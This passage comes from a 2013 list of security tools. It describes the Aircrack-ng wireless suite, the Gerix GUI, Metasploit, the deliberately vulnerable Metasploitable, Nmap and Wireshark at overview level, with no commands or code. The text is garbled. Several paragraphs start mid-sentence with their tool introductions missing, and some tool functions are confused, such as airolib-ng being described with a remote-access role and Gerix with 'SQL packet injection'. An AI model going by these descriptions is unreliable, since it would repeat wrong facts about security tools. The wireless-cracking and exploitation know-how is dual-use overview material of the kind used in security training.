lists and compute Pairwise Master Keys) and airserv-ng (which allows the penetration tester to
access the wireless card from other computers). Airolib-ng is similar to easside-ng, which allows
the user to run tools on a remote computer; there are also easside-ng (a means to communicate with
an access point without the WEP key), tkiptun-ng (for WPA/TKIP attacks) and wesside-ng (an
automatic tool for recovering WEP keys).
Like most of the security tools in our list, Aircrack also has a GUI interface, called Gerix Wifi
Cracker. Gerix is a freely licensed security tool under the GNU General Public License and is
bundled with penetration testing Linux distributions such as BackTrack and Backbox. The
Gerix GUI has several penetration testing tools that allow for network analysis, wireless packet
capturing, and SQL packet injection.
Metasploit is huge. Developed by Rapid7 and used by every pentester and ethical hacker in the
world. Period. The Metasploit Project is a security project which delivers information about
security vulnerabilities and helps with penetration testing and intrusion detection. The open source
project known as the Metasploit Framework is used by security professionals to execute
exploit code against a remote target machine, for penetration testing of course!
Another cool project is Metasploitable, an intentionally vulnerable version of Ubuntu
Linux built on purpose for testing security tools, like all of the ones listed here, and demonstrating
common vulnerabilities.
analyzes the responses. The program is really sophisticated because, unlike other port scanners
out there, Nmap sends packets based upon network conditions, taking into account
fluctuations, congestion and more.
802.11, PPP, and even loopback. Like most tools in our 2013 Concise Courses Security List, the
captured network data can be monitored and managed via a GUI, which also allows plugins to be
inserted and used. Wireshark can also capture VoIP packets (like Cain & Abel, see tool 3), and
raw USB traffic can be captured as well.